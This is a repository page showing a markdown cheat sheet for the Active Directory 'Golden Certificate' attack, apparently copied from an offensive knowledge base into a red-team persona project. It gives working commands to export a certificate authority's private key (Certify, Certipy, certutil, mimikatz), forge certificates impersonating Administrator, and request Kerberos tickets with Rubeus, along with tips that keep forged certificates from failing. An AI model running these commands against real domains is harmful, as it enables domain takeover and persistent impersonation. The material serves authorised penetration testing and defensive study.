salvacybersec/personas
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
448d1cdcd9fd186b803e153f9d91c0edb37c8469
personas/personas/_shared/internal-allthethings/active-directory/ad-adcs-golden-certificate.md
salvacybersec 448d1cdcd9 feat(install): add OpenCode target + InternalAllTheThings knowledge base 
- install_opencode: deploys 29 personas as agents + 1011 skills to
  ~/.config/opencode/{agents,skills}/. Uses OpenCode's markdown+YAML
  agent format (mode/color/permission) and SKILL.md format.
- Topic filter with sensible defaults (drops marketing/biz ~514 skills).
  CLI: --opencode-topics security-offensive,coding-backend,...
- Clone of swisskyrepo/InternalAllTheThings (168 MD, 1.7MB) added to
  _shared/ as a reference trove for AD attack paths, ADCS ESC1-15,
  Kerberos delegation, NTLM relay/coerce, lateral movement, persistence.
- NEO redteam + VORTEX cloud-ad personas reference the new KB with
  MITRE ATT&CK TTP mapping pointers.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-16 03:11:44 +03:00

4.1 KiB
Raw Blame History

Active Directory - Golden Certificate

A Golden Certificate is a maliciously crafted certificate that an attacker generates using the CAs private key.

Obtain CA certificate

Export the CA certificate including the private key:

  • GhostPack/Certify

    Certify.exe manage-self --dump-certs

  • ly4k/Certipy

    certipy ca -u 'administrator@corp.local' -p 'Passw0rd!' -ns '10.10.10.10' -target 'CA.CORP.LOCAL' -config 'CA.CORP.LOCAL\CORP-CA' -backup

  • windows-gui/certsrv.msc

    • Open certsrv.msc
    • Right click the CA -> All Tasks -> Back up CA...
    • Follow the wizard but make sure to check Private key and CA certificate

  • windows-gui/certlm.msc

    • Open certlm.msc
    • Go to Personal -> Certificates
    • Right click the CA signing certificate -> All Tasks -> Export
    • Follow the wizard but make sure to choose Yes, export the private key

  • windows-commands/certutil

    certutil -backupKey -f -p SuperSecurePassw0rd! C:\Windows\Tasks\CaBackupFolder

  • gentilkiwi/mimikatz

    mimikatz.exe "crypto::capi" "crypto::cng" "crypto::certificates /export"

Forge Golden Certificates

Forge a certificate of a target principal:

  • GhostPack/Certify

    Certify.exe forge --ca-cert <pfx-path/base64-pfx> --upn Administrator --sid S-1-5-21-976219687-1556195986-4104514715-500

  • GhostPack/ForgeCert

    ForgeCert.exe --CaCertPath "ca.pfx" --CaCertPassword "Password" --Subject "CN=User" --SubjectAltName "administrator@domain.local" --NewCertPath "administrator.pfx" --NewCertPassword "Password"

  • ly4k/Certipy

    certipy forge -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500' -crl 'ldap:///'

certipy forge -template 'attacker.pfx' -ca-pfx 'CORP-CA.pfx' -upn 'administrator@corp.local' -sid 'S-1-5-21-...-500'

⚠️ Useful parameters when generating a golden certificate.

  • -crl: If the -crl option is omitted when forging, authentication might fail. While the KDC doesn't typically perform an active CRL lookup during initial TGT issuance for performance reasons, it does often check for the presence of a CDP extension in the certificate. Its absence can lead to a KDC_ERROR_CLIENT_NOT_TRUSTED error.
  • -template 'attacker.pfx': Certipy will copy extensions (like Key Usage, basic constraints, AIA, etc.) from attacker.pfx into the new forged certificate, while still setting the subject, UPN, and SID as specified.
  • -subject "CN=xyz-CA-1, DC=xyz, DC=htb": set the Distinguished Name for the certificate

Request a TGT

  • GhostPack/Rubeus

    Rubeus.exe asktgt /user:Administrator /domain:dumpster.fire /certificate:<pfx-path/base64-pfx>

  • ly4k/Certipy

    certipy auth -pfx 'administrator_forged.pfx' -dc-ip '10.10.10.10'

References